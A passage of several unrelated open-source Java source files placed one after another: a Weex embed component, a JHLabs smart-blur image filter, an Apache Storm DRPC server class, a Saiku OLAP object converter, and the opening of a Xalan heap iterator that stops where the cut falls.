return true;
}
@Override
public String transformUrl(String origin) {
return origin;
}
@Override
public void onCreated(NestedContainer comp, WXSDKInstance nestedInstance) {
}
}
static class EmbedRenderListener implements IWXRenderListener {
WXEmbed mComponent;
OnNestedInstanceEventListener mEventListener;
EmbedRenderListener(WXEmbed comp) {
mComponent = comp;
mEventListener = new ClickToReloadListener();
}
@Override
public void onViewCreated(WXSDKInstance instance, View view) {
FrameLayout hostView = mComponent.getHostView();
hostView.removeAllViews();
hostView.addView(view);
}
@Override
public void onRenderSuccess(WXSDKInstance instance, int width, int height) {
}
@Override
public void onRefreshSuccess(WXSDKInstance instance, int width, int height) {
}
@Override
public void onException(WXSDKInstance instance, String errCode, String msg) {
if (mEventListener != null) {
mEventListener.onException(mComponent, errCode, msg);
}
}
}
@Deprecated
public WXEmbed(WXSDKInstance instance, WXDomObject dom, WXVContainer parent, String instanceId, boolean isLazy) {
this(instance,dom,parent);
}
public WXEmbed(WXSDKInstance instance, WXDomObject node, WXVContainer parent) {
super(instance, node, parent);
mListener = new EmbedRenderListener(this);
ERROR_IMG_WIDTH = (int) WXViewUtils.getRealPxByWidth(270,instance.getInstanceViewPortWidth());
ERROR_IMG_HEIGHT = (int) WXViewUtils.getRealPxByWidth(260,instance.getInstanceViewPortWidth());
if(instance instanceof EmbedManager) {
Object itemId = node.getAttrs().get(ITEM_ID);
if (itemId != null) {
((EmbedManager) instance).putEmbed(itemId.toString(), this);
}
}
}
@Override
public void setOnNestEventListener(OnNestedInstanceEventListener listener){
mListener.mEventListener = listener;
}
@Override
public ViewGroup getViewContainer() {
return getHostView();
}
@Override
protected boolean setProperty(String key, Object param) {
switch (key) {
case Constants.Name.SRC:
String src = WXUtils.getString(param,null);
if (src != null)
setSrc(src);
return true;
}
return super.setProperty(key, param);
}
@Override
public void renderNewURL(String url) {
src = url;
loadContent();
}
@Override
public void reload() {
if (!TextUtils.isEmpty(src)) {
loadContent();
}
}
public String getOriginUrl() {
return originUrl;
}
public void setOriginUrl(String originUrl) {
this.originUrl = originUrl;
}
private String originUrl;
@WXComponentProp(name = Constants.Name.SRC)
public void setSrc(String src) {
originUrl=src;
this.src = src;
if (mNestedInstance != null) {
mNestedInstance.destroy();
mNestedInstance = null;
}
if (mIsVisible && !TextUtils.isEmpty(this.src)) {
loadContent();
}
}
public String getSrc() {
return src;
}
/**
* Load embed content, default behavior is create a nested instance.
*/
protected void loadContent(){
mNestedInstance = createInstance();
if(mListener != null && mListener.mEventListener != null){
if(!mListener.mEventListener.onPreCreate(this,src)){
//cancel render
mListener.mEventListener.onCreated(this, mNestedInstance);
}
}
}
private WXSDKInstance createInstance() {
WXSDKInstance sdkInstance = getInstance().createNestedInstance(this);
getInstance().addOnInstanceVisibleListener(this);
sdkInstance.registerRenderListener(mListener);
String url=src;
if(mListener != null && mListener.mEventListener != null){
url=mListener.mEventListener.transformUrl(src);
if(!mListener.mEventListener.onPreCreate(this,src)){
//cancel render
return null;
}
}
if(TextUtils.isEmpty(url)){
mListener.mEventListener.onException(this,WXRenderErrorCode.WX_USER_INTERCEPT_ERROR,"degradeToH5");
return sdkInstance;
}
ViewGroup.LayoutParams layoutParams = getHostView().getLayoutParams();
sdkInstance.renderByUrl(WXPerformance.DEFAULT,
url,
null, null, layoutParams.width,
layoutParams.height,
WXRenderStrategy.APPEND_ASYNC);
return sdkInstance;
}
@Override
public void setVisibility(String visibility) {
super.setVisibility(visibility);
boolean visible = TextUtils.equals(visibility, Constants.Value.VISIBLE);
if (!TextUtils.isEmpty(src) && visible) {
if (mNestedInstance == null) {
loadContent();
} else {
mNestedInstance.onViewAppear();
}
}
if (!visible) {
if (mNestedInstance != null) {
mNestedInstance.onViewDisappear();
}
}
mIsVisible = visible;
}
@Override
public void destroy() {
super.destroy();
if (mNestedInstance != null) {
mNestedInstance.destroy();
mNestedInstance = null;
}
src = null;
if (getInstance() != null) {
getInstance().removeOnInstanceVisibleListener(this);
}
}
@Override
public void onAppear() {
//appear event from root instance will not trigger visibility change
if(mIsVisible && mNestedInstance != null){
WXComponent comp = mNestedInstance.getRootComponent();
if(comp != null)
comp.fireEvent(Constants.Event.VIEWAPPEAR);
}
}
@Override
public void onDisappear() {
//appear event from root instance will not trigger visibility change
if(mIsVisible && mNestedInstance != null){
WXComponent comp = mNestedInstance.getRootComponent();
if(comp != null)
comp.fireEvent(Constants.Event.VIEWDISAPPEAR);
}
}
@Override
public void onActivityStart() {
super.onActivityStart();
if (mNestedInstance != null) {
mNestedInstance.onActivityStart();
}
}
@Override
public void onActivityResume() {
super.onActivityResume();
if (mNestedInstance != null) {
mNestedInstance.onActivityResume();
}
}
@Override
public void onActivityPause() {
super.onActivityPause();
if (mNestedInstance != null) {
mNestedInstance.onActivityPause();
}
}
@Override
public void onActivityStop() {
super.onActivityStop();
if (mNestedInstance != null) {
mNestedInstance.onActivityStop();
}
}
@Override
public void onActivityDestroy() {
super.onActivityDestroy();
if (mNestedInstance != null) {
mNestedInstance.onActivityDestroy();
}
}
}
|
|
/*
Copyright 2006 Jerry Huxtable
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package com.jhlabs.image;
import java.awt.*;
import java.awt.image.*;
import java.awt.geom.*;
/**
* A filter which performs a "smart blur". i.e. a blur which blurs smotth parts of the image while preserving edges.
*/
public class SmartBlurFilter extends AbstractBufferedImageOp {
private int hRadius = 5;
private int vRadius = 5;
private int threshold = 10;
public BufferedImage filter( BufferedImage src, BufferedImage dst ) {
int width = src.getWidth();
int height = src.getHeight();
if ( dst == null )
dst = createCompatibleDestImage( src, null );
int[] inPixels = new int[width*height];
int[] outPixels = new int[width*height];
getRGB( src, 0, 0, width, height, inPixels );
Kernel kernel = GaussianFilter.makeKernel(hRadius);
thresholdBlur( kernel, inPixels, outPixels, width, height, true );
thresholdBlur( kernel, outPixels, inPixels, height, width, true );
setRGB( dst, 0, 0, width, height, inPixels );
return dst;
}
/**
* Convolve with a kernel consisting of one row
*/
private void thresholdBlur(Kernel kernel, int[] inPixels, int[] outPixels, int width, int height, boolean alpha) {
int index = 0;
float[] matrix = kernel.getKernelData( null );
int cols = kernel.getWidth();
int cols2 = cols/2;
for (int y = 0; y < height; y++) {
int ioffset = y*width;
int outIndex = y;
for (int x = 0; x < width; x++) {
float r = 0, g = 0, b = 0, a = 0;
int moffset = cols2;
int rgb1 = inPixels[ioffset+x];
int a1 = (rgb1 >> 24) & 0xff;
int r1 = (rgb1 >> 16) & 0xff;
int g1 = (rgb1 >> 8) & 0xff;
int b1 = rgb1 & 0xff;
float af = 0, rf = 0, gf = 0, bf = 0;
for (int col = -cols2; col <= cols2; col++) {
float f = matrix[moffset+col];
if (f != 0) {
int ix = x+col;
if (!(0 <= ix && ix < width))
ix = x;
int rgb2 = inPixels[ioffset+ix];
int a2 = (rgb2 >> 24) & 0xff;
int r2 = (rgb2 >> 16) & 0xff;
int g2 = (rgb2 >> 8) & 0xff;
int b2 = rgb2 & 0xff;
int d;
d = a1-a2;
if ( d >= -threshold && d <= threshold ) {
a += f * a2;
af += f;
}
d = r1-r2;
if ( d >= -threshold && d <= threshold ) {
r += f * r2;
rf += f;
}
d = g1-g2;
if ( d >= -threshold && d <= threshold ) {
g += f * g2;
gf += f;
}
d = b1-b2;
if ( d >= -threshold && d <= threshold ) {
b += f * b2;
bf += f;
}
}
}
a = af == 0 ? a1 : a/af;
r = rf == 0 ? r1 : r/rf;
g = gf == 0 ? g1 : g/gf;
b = bf == 0 ? b1 : b/bf;
int ia = alpha ? PixelUtils.clamp((int)(a+0.5)) : 0xff;
int ir = PixelUtils.clamp((int)(r+0.5));
int ig = PixelUtils.clamp((int)(g+0.5));
int ib = PixelUtils.clamp((int)(b+0.5));
outPixels[outIndex] = (ia << 24) | (ir << 16) | (ig << 8) | ib;
outIndex += height;
}
}
}
/**
* Set the horizontal size of the blur.
* @param hRadius the radius of the blur in the horizontal direction
* @min-value 0
* @see #getHRadius
*/
public void setHRadius(int hRadius) {
this.hRadius = hRadius;
}
/**
* Get the horizontal size of the blur.
* @return the radius of the blur in the horizontal direction
* @see #setHRadius
*/
public int getHRadius() {
return hRadius;
}
/**
* Set the vertical size of the blur.
* @param vRadius the radius of the blur in the vertical direction
* @min-value 0
* @see #getVRadius
*/
public void setVRadius(int vRadius) {
this.vRadius = vRadius;
}
/**
* Get the vertical size of the blur.
* @return the radius of the blur in the vertical direction
* @see #setVRadius
*/
public int getVRadius() {
return vRadius;
}
/**
* Set the radius of the effect.
* @param radius the radius
* @min-value 0
* @see #getRadius
*/
public void setRadius(int radius) {
this.hRadius = this.vRadius = radius;
}
/**
* Get the radius of the effect.
* @return the radius
* @see #setRadius
*/
public int getRadius() {
return hRadius;
}
/**
* Set the threshold value.
* @param threshold the threshold value
* @see #getThreshold
*/
public void setThreshold(int threshold) {
this.threshold = threshold;
}
/**
* Get the threshold value.
* @return the threshold value
* @see #setThreshold
*/
public int getThreshold() {
return threshold;
}
public String toString() {
return "Blur/Smart Blur...";
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.storm.daemon.drpc;
import com.codahale.metrics.Meter;
import java.security.Principal;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Timer;
import java.util.TimerTask;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.concurrent.atomic.AtomicLong;
import org.apache.storm.DaemonConfig;
import org.apache.storm.daemon.StormCommon;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.generated.DRPCExceptionType;
import org.apache.storm.generated.DRPCExecutionException;
import org.apache.storm.generated.DRPCRequest;
import org.apache.storm.logging.ThriftAccessLogger;
import org.apache.storm.metric.StormMetricsRegistry;
import org.apache.storm.security.auth.IAuthorizer;
import org.apache.storm.security.auth.ReqContext;
import org.apache.storm.security.auth.authorizer.DRPCAuthorizerBase;
import org.apache.storm.shade.com.google.common.annotations.VisibleForTesting;
import org.apache.storm.utils.ObjectReader;
import org.apache.storm.utils.WrappedAuthorizationException;
import org.apache.storm.utils.WrappedDRPCExecutionException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class DRPC implements AutoCloseable {
private static final Logger LOG = LoggerFactory.getLogger(DRPC.class);
private static final DRPCRequest NOTHING_REQUEST = new DRPCRequest("", "");
private static final DRPCExecutionException TIMED_OUT = new WrappedDRPCExecutionException("Timed Out");
private static final DRPCExecutionException SHUT_DOWN = new WrappedDRPCExecutionException("Server Shutting Down");
private static final DRPCExecutionException DEFAULT_FAILED = new WrappedDRPCExecutionException("Request failed");
private static final Meter meterServerTimedOut = StormMetricsRegistry.registerMeter("drpc:num-server-timedout-requests");
private static final Meter meterExecuteCalls = StormMetricsRegistry.registerMeter("drpc:num-execute-calls");
private static final Meter meterResultCalls = StormMetricsRegistry.registerMeter("drpc:num-result-calls");
private static final Meter meterFailRequestCalls = StormMetricsRegistry.registerMeter("drpc:num-failRequest-calls");
private static final Meter meterFetchRequestCalls = StormMetricsRegistry.registerMeter("drpc:num-fetchRequest-calls");
static {
TIMED_OUT.set_type(DRPCExceptionType.SERVER_TIMEOUT);
SHUT_DOWN.set_type(DRPCExceptionType.SERVER_SHUTDOWN);
DEFAULT_FAILED.set_type(DRPCExceptionType.FAILED_REQUEST);
}
//Waiting to be fetched
private final ConcurrentHashMap<String, ConcurrentLinkedQueue<OutstandingRequest>> _queues =
new ConcurrentHashMap<>();
//Waiting to be returned
private final ConcurrentHashMap<String, OutstandingRequest> _requests =
new ConcurrentHashMap<>();
private final Timer _timer = new Timer();
private final AtomicLong _ctr = new AtomicLong(0);
private final IAuthorizer _auth;
public DRPC(Map<String, Object> conf) {
this(mkAuthorizationHandler((String) conf.get(DaemonConfig.DRPC_AUTHORIZER), conf),
ObjectReader.getInt(conf.get(DaemonConfig.DRPC_REQUEST_TIMEOUT_SECS), 600) * 1000);
}
public DRPC(IAuthorizer auth, long timeoutMs) {
_auth = auth;
_timer.scheduleAtFixedRate(new TimerTask() {
@Override
public void run() {
cleanupAll(timeoutMs, TIMED_OUT);
}
}, timeoutMs / 2, timeoutMs / 2);
}
private static IAuthorizer mkAuthorizationHandler(String klassname, Map<String, Object> conf) {
try {
return StormCommon.mkAuthorizationHandler(klassname, conf);
} catch (Exception e) {
throw new RuntimeException(e);
}
}
private static void logAccess(String operation, String function) {
logAccess(ReqContext.context(), operation, function);
}
private static void logAccess(ReqContext reqContext, String operation, String function) {
ThriftAccessLogger.logAccessFunction(reqContext.requestID(), reqContext.remoteAddress(), reqContext.principal(), operation,
function);
}
@VisibleForTesting
static void checkAuthorization(ReqContext reqContext, IAuthorizer auth, String operation, String function)
throws AuthorizationException {
checkAuthorization(reqContext, auth, operation, function, true);
}
private static void checkAuthorization(ReqContext reqContext, IAuthorizer auth, String operation, String function, boolean log)
throws AuthorizationException {
if (reqContext != null && log) {
logAccess(reqContext, operation, function);
}
if (auth != null) {
Map<String, Object> map = new HashMap<>();
map.put(DRPCAuthorizerBase.FUNCTION_NAME, function);
if (!auth.permit(reqContext, operation, map)) {
Principal principal = reqContext.principal();
String user = (principal != null) ? principal.getName() : "unknown";
throw new WrappedAuthorizationException("DRPC request '" + operation + "' for '" + user + "' user is not authorized");
}
}
}
private void checkAuthorization(String operation, String function) throws AuthorizationException {
checkAuthorization(ReqContext.context(), _auth, operation, function);
}
private void checkAuthorizationNoLog(String operation, String function) throws AuthorizationException {
checkAuthorization(ReqContext.context(), _auth, operation, function, false);
}
private void cleanup(String id) {
OutstandingRequest req = _requests.remove(id);
if (req != null && !req.wasFetched()) {
_queues.get(req.getFunction()).remove(req);
}
}
private void cleanupAll(long timeoutMs, DRPCExecutionException exp) {
for (Entry<String, OutstandingRequest> e : _requests.entrySet()) {
OutstandingRequest req = e.getValue();
if (req.isTimedOut(timeoutMs)) {
req.fail(exp);
cleanup(e.getKey());
meterServerTimedOut.mark();
}
}
}
private String nextId() {
return String.valueOf(_ctr.incrementAndGet());
}
private ConcurrentLinkedQueue<OutstandingRequest> getQueue(String function) {
if (function == null) {
throw new IllegalArgumentException("The function for a request cannot be null");
}
ConcurrentLinkedQueue<OutstandingRequest> queue = _queues.get(function);
if (queue == null) {
_queues.putIfAbsent(function, new ConcurrentLinkedQueue<>());
queue = _queues.get(function);
}
return queue;
}
public void returnResult(String id, String result) throws AuthorizationException {
meterResultCalls.mark();
LOG.debug("Got a result {} {}", id, result);
OutstandingRequest req = _requests.get(id);
if (req != null) {
checkAuthorization("result", req.getFunction());
req.returnResult(result);
}
}
public DRPCRequest fetchRequest(String functionName) throws AuthorizationException {
meterFetchRequestCalls.mark();
checkAuthorizationNoLog("fetchRequest", functionName);
ConcurrentLinkedQueue<OutstandingRequest> q = getQueue(functionName);
OutstandingRequest req = q.poll();
if (req != null) {
//Only log accesses that fetched something
logAccess("fetchRequest", functionName);
req.fetched();
DRPCRequest ret = req.getRequest();
return ret;
}
return NOTHING_REQUEST;
}
public void failRequest(String id, DRPCExecutionException e) throws AuthorizationException {
meterFailRequestCalls.mark();
LOG.debug("Got a fail {}", id);
OutstandingRequest req = _requests.get(id);
if (req != null) {
checkAuthorization("failRequest", req.getFunction());
if (e == null) {
e = DEFAULT_FAILED;
}
req.fail(e);
}
}
public <T extends OutstandingRequest> T execute(String functionName, String funcArgs, RequestFactory<T> factory) throws
AuthorizationException {
meterExecuteCalls.mark();
checkAuthorization("execute", functionName);
String id = nextId();
LOG.debug("Execute {} {}", functionName, funcArgs);
T req = factory.mkRequest(functionName, new DRPCRequest(funcArgs, id));
_requests.put(id, req);
ConcurrentLinkedQueue<OutstandingRequest> q = getQueue(functionName);
q.add(req);
return req;
}
public String executeBlocking(String functionName, String funcArgs) throws DRPCExecutionException, AuthorizationException {
BlockingOutstandingRequest req = execute(functionName, funcArgs, BlockingOutstandingRequest.FACTORY);
try {
LOG.debug("Waiting for result {} {}", functionName, funcArgs);
return req.getResult();
} catch (DRPCExecutionException e) {
throw e;
} finally {
cleanup(req.getRequest().get_request_id());
}
}
@Override
public void close() {
_timer.cancel();
cleanupAll(0, SHUT_DOWN);
}
}
|
|
/*
* Copyright 2014 OSBI Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.saiku.olap.util;
import org.saiku.olap.dto.*;
import org.saiku.olap.dto.SaikuSelection.Type;
import org.saiku.olap.query.IQuery;
import org.saiku.service.util.exception.SaikuServiceException;
import org.apache.commons.lang.StringUtils;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import org.olap4j.Axis;
import org.olap4j.OlapException;
import org.olap4j.metadata.*;
import org.olap4j.query.QueryAxis;
import org.olap4j.query.QueryDimension;
import org.olap4j.query.Selection;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.lang.reflect.Constructor;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.*;
import mondrian.olap.Annotation;
import mondrian.olap4j.Checker;
import mondrian.olap4j.LevelInterface;
import mondrian.olap4j.SaikuMondrianHelper;
/**
* ObjectUtil.
*/
public class ObjectUtil {
private static final Logger LOG = LoggerFactory.getLogger(ObjectUtil.class);
private ObjectUtil() {
}
@NotNull
public static SaikuCube convert(String connection, @NotNull Cube c) {
return new SaikuCube(
connection,
c.getUniqueName(),
c.getName(),
c.getCaption(),
c.getSchema().getCatalog().getName(),
c.getSchema().getName(),
c.isVisible());
}
@NotNull
public static SaikuDimension convert(@NotNull Dimension dim) {
return new SaikuDimension(
dim.getName(),
dim.getUniqueName(),
dim.getCaption(),
dim.getDescription(),
dim.isVisible(),
convertHierarchies(dim.getHierarchies()));
}
@NotNull
private static SaikuDimension convert(@NotNull QueryDimension dim) {
return convert(dim.getDimension());
}
@NotNull
public static List<SaikuDimension> convertQueryDimensions(@NotNull List<QueryDimension> dims) {
List<SaikuDimension> dimList = new ArrayList<>();
for (QueryDimension d : dims) {
dimList.add(convert(d));
}
return dimList;
}
@NotNull
public static List<SaikuDimension> convertDimensions(@NotNull List<Dimension> dims) {
List<SaikuDimension> dimList = new ArrayList<>();
for (Dimension d : dims) {
dimList.add(convert(d));
}
return dimList;
}
@NotNull
public static List<SaikuHierarchy> convertHierarchies(@NotNull List<Hierarchy> hierarchies) {
List<SaikuHierarchy> hierarchyList = new ArrayList<>();
for (Hierarchy h : hierarchies) {
hierarchyList.add(convert(h));
}
return hierarchyList;
}
@NotNull
public static SaikuHierarchy convert(@NotNull Hierarchy hierarchy) {
try {
return new SaikuHierarchy(
hierarchy.getName(),
hierarchy.getUniqueName(),
hierarchy.getCaption(),
hierarchy.getDescription(),
hierarchy.getDimension().getUniqueName(),
hierarchy.isVisible(),
convertLevels(hierarchy.getLevels()),
convertMembers(hierarchy.getRootMembers()));
} catch (OlapException e) {
throw new SaikuServiceException("Cannot get root members", e);
}
}
@NotNull
public static List<SaikuLevel> convertLevels(@NotNull List<Level> levels) {
List<SaikuLevel> levelList = new ArrayList<>();
for (Level l : levels) {
levelList.add(convert(l));
}
return levelList;
}
@NotNull
private static SaikuLevel convert(@NotNull Level level) {
Checker c = new Checker();
try {
try {
Class.forName("mondrian.olap4j.MondrianOlap4jLevelExtend");
//Class.forName("bi.meteorite.CheckClass");
Class<LevelInterface> _tempClass = (Class<LevelInterface>) Class.forName("mondrian.olap4j.MondrianOlap4jLevelExtend");
if (c.checker(level)) {
Constructor<LevelInterface> ctor = _tempClass.getDeclaredConstructor(org.olap4j.metadata.Level.class);
LevelInterface test = ctor.newInstance(level);
HashMap<String, String> m = null;
if (test.getAnnotations() != null) {
m = new HashMap<>();
for (Map.Entry<String, Annotation> entry : test.getAnnotations().entrySet()) {
m.put(entry.getKey(), (String) entry.getValue().getValue());
}
}
return new SaikuLevel(
test.getName(),
test.getUniqueName(),
test.getCaption(),
test.getDescription(),
test.getDimension().getUniqueName(),
test.getHierarchy().getUniqueName(),
test.isVisible(),
test.getLevelType().toString(),
m);
} else {
return new SaikuLevel(
level.getName(),
level.getUniqueName(),
level.getCaption(),
level.getDescription(),
level.getDimension().getUniqueName(),
level.getHierarchy().getUniqueName(),
level.isVisible(),
null, null);
}
} catch (ClassNotFoundException e) {
return new SaikuLevel(
level.getName(),
level.getUniqueName(),
level.getCaption(),
level.getDescription(),
level.getDimension().getUniqueName(),
level.getHierarchy().getUniqueName(),
level.isVisible(),
null, null);
}
} catch (Exception e) {
throw new SaikuServiceException("Cannot convert level: " + level, e);
}
}
@NotNull
public static List<SaikuMember> convertMembers(@NotNull Collection<Member> members) {
List<SaikuMember> memberList = new ArrayList<>();
for (Member m : members) {
memberList.add(convert(m));
}
return memberList;
}
@NotNull
private static List<SaikuSelection> convertSelections(@NotNull List<Selection> selections,
@NotNull QueryDimension dim, @NotNull IQuery query) {
List<SaikuSelection> selectionList = new ArrayList<>();
for (Selection sel : selections) {
selectionList.add(convert(sel, dim, query));
}
return selectionList;
}
private static Level getSelectionLevel(@NotNull Selection sel) {
Level retVal;
if (Level.class.isAssignableFrom(sel.getRootElement().getClass())) {
retVal = (Level) sel.getRootElement();
} else {
retVal = ((Member) sel.getRootElement()).getLevel();
}
return retVal;
}
@NotNull
private static SaikuSelection convert(@NotNull Selection sel, @NotNull QueryDimension dim, @NotNull IQuery query) {
Type type;
String hierarchyUniqueName;
String levelUniqueName;
Level level;
if (Level.class.isAssignableFrom(sel.getRootElement().getClass())) {
level = (Level) sel.getRootElement();
type = SaikuSelection.Type.LEVEL;
hierarchyUniqueName = ((Level) sel.getRootElement()).getHierarchy().getUniqueName();
levelUniqueName = sel.getUniqueName();
} else {
level = ((Member) sel.getRootElement()).getLevel();
type = SaikuSelection.Type.MEMBER;
hierarchyUniqueName = ((Member) sel.getRootElement()).getHierarchy().getUniqueName();
levelUniqueName = ((Member) sel.getRootElement()).getLevel().getUniqueName();
}
String totalsFunction = query.getTotalFunction(level.getUniqueName());
List<QueryDimension> dimensions = dim.getAxis().getDimensions();
QueryDimension lastDimension = dimensions.get(dimensions.size() - 1);
Selection deepestSelection = null;
int selectionDepth = -1;
for (Selection selection : lastDimension.getInclusions()) {
Level current = getSelectionLevel(selection);
if (selectionDepth < current.getDepth()) {
deepestSelection = selection;
selectionDepth = current.getDepth();
}
}
return new SaikuSelection(
sel.getRootElement().getName(),
sel.getUniqueName(),
sel.getRootElement().getCaption(),
sel.getRootElement().getDescription(),
sel.getDimension().getName(),
hierarchyUniqueName,
levelUniqueName,
type,
totalsFunction,
sel.equals(deepestSelection));
}
@NotNull
public static SaikuMember convert(@NotNull Member m) {
return new SaikuMember(
m.getName(),
m.getUniqueName(),
m.getCaption(),
m.getDescription(),
m.getDimension().getUniqueName(),
m.getHierarchy().getUniqueName(),
m.getLevel().getUniqueName(),
m.isCalculated());
}
@NotNull
public static SaikuMeasure convertMeasure(@NotNull Measure m) {
Map<String, Property> props2 = m.getProperties().asMap();
NamedList<Property> props = m.getProperties();
//String f = m.getPropertyValue(Property.);
String f = SaikuMondrianHelper.getMeasureGroup(m);
return new SaikuMeasure(
m.getName(),
m.getUniqueName(),
m.getCaption(),
m.getDescription(),
m.getDimension().getUniqueName(),
m.getHierarchy().getUniqueName(),
m.getLevel().getUniqueName(),
m.isVisible(),
m.isCalculated() | m.isCalculatedInQuery(),
f);
}
@NotNull
public static SaikuDimensionSelection convertDimensionSelection(@NotNull QueryDimension dim, @NotNull IQuery query) {
List<SaikuSelection> selections = ObjectUtil.convertSelections(dim.getInclusions(), dim, query);
return new SaikuDimensionSelection(
dim.getName(),
dim.getDimension().getUniqueName(),
dim.getDimension().getCaption(),
dim.getDimension().getDescription(),
selections);
}
@NotNull
private static List<SaikuDimensionSelection> convertDimensionSelections(@NotNull List<QueryDimension> dimensions,
@NotNull IQuery query) {
List<SaikuDimensionSelection> dims = new ArrayList<>();
for (QueryDimension dim : dimensions) {
dims.add(convertDimensionSelection(dim, query));
}
return dims;
}
@NotNull
private static SaikuAxis convertQueryAxis(@NotNull QueryAxis axis, @NotNull IQuery query) {
List<SaikuDimensionSelection> dims = ObjectUtil.convertDimensionSelections(axis.getDimensions(), query);
Axis location = axis.getLocation();
String so = axis.getSortOrder() == null ? null : axis.getSortOrder().name();
SaikuAxis sax = new SaikuAxis(
location.name(),
location.axisOrdinal(),
axis.getName(),
dims,
so,
axis.getSortIdentifierNodeName(),
query.getTotalFunction(axis.getName()));
try {
if (axis.getLimitFunction() != null) {
sax.setLimitFunction(axis.getLimitFunction().toString());
sax.setLimitFunctionN(axis.getLimitFunctionN().toPlainString());
sax.setLimitFunctionSortLiteral(axis.getLimitFunctionSortLiteral());
}
if (StringUtils.isNotBlank(axis.getFilterCondition())) {
sax.setFilterCondition(axis.getFilterCondition());
}
} catch (Error e) {
LOG.error("Could not convert query axis", e);
}
return sax;
}
@NotNull
public static SaikuQuery convert(@NotNull IQuery q) {
List<SaikuAxis> axes = new ArrayList<>();
if (q.getType().equals(IQuery.QueryType.QM)) {
for (Axis axis : q.getAxes().keySet()) {
if (axis != null) {
axes.add(convertQueryAxis(q.getAxis(axis), q));
}
}
}
return new SaikuQuery(q.getName(), q.getSaikuCube(), axes, q.getMdx(), q.getType().toString(), q.getProperties());
}
@NotNull
public static List<SimpleCubeElement> convert2Simple(@Nullable Collection<? extends MetadataElement> mset) {
List<SimpleCubeElement> elements = new ArrayList<>();
if (mset != null) {
for (MetadataElement e : mset) {
elements.add(new SimpleCubeElement(e.getName(), e.getUniqueName(), e.getCaption()));
}
}
return elements;
}
@NotNull
public static List<SimpleCubeElement> convert2simple(@Nullable ResultSet rs) {
try {
int width = 0;
boolean first = true;
List<SimpleCubeElement> elements = new ArrayList<>();
if (rs != null) {
while (rs.next()) {
if (first) {
first = false;
width = rs.getMetaData().getColumnCount();
}
String[] row = new String[3];
for (int i = 0; i < width; i++) {
row[i] = rs.getString(i + 1);
}
SimpleCubeElement s = new SimpleCubeElement(row[0], row[1], row[2]);
elements.add(s);
}
}
return elements;
} catch (Exception e) {
throw new SaikuServiceException("Error converting ResultSet into SimpleCubeElement", e);
} finally {
if (rs != null) {
Statement statement = null;
Connection con = null;
try {
statement = rs.getStatement();
} catch (Exception e) {
throw new SaikuServiceException(e);
} finally {
try {
rs.close();
if (statement != null) {
statement.close();
}
} catch (Exception ee) {
LOG.error("Could not close statement", ee);
}
rs = null;
}
}
}
}
}
|
|
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Copyright 2001-2006 The Apache Software Foundation.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/*
* $Id: UnionIterator.java 337874 2004-02-16 23:06:53Z minchau $
*/
package com.sun.org.apache.xalan.internal.xsltc.dom;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.runtime.BasisLibrary;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.dtm.ref.DTMAxisIteratorBase;
/**
* <p><code>MultiValuedNodeHeapIterator</code> takes a set of multi-valued
* heap nodes and produces a merged NodeSet in document order with duplicates
* removed.</p>
* <p>Each multi-valued heap node (which might be a
* {@link org.apache.xml.dtm.DTMAxisIterator}, but that's not necessary)
* generates DTM node handles in document order. The class
* maintains the multi-valued heap nodes in a heap, not surprisingly, sorted by
* the next DTM node handle available form the heap node.</p>
* <p>After a DTM node is pulled from the heap node that's at the top of the
* heap, the heap node is advanced to the next DTM node handle it makes
* available, and the heap nature of the heap is restored to ensure the next
* DTM node handle pulled is next in document order overall.
*
* @author Jacek Ambroziak
* @author Santiago Pericas-Geertsen
*/
public abstract class MultiValuedNodeHeapIterator extends DTMAxisIteratorBase {
/** wrapper for NodeIterators to support iterator
comparison on the value of their next() method
*/
/**
* An abstract representation of a set of nodes that will be retrieved in
* document order.
*/
public abstract class HeapNode implements Cloneable {
protected int _node, _markedNode;
protected boolean _isStartSet = false;
/**
* Advance to the next node represented by this {@link HeapNode}
*
* @return the next DTM node.
*/
public abstract int step();
/**
* Creates a deep copy of this {@link HeapNode}. The clone is not
* reset from the current position of the original.
*
* @return the cloned heap node
*/
public HeapNode cloneHeapNode() {
HeapNode clone;
try {
clone = (HeapNode) super.clone();
} catch (CloneNotSupportedException e) {
BasisLibrary.runTimeError(BasisLibrary.ITERATOR_CLONE_ERR,
e.toString());
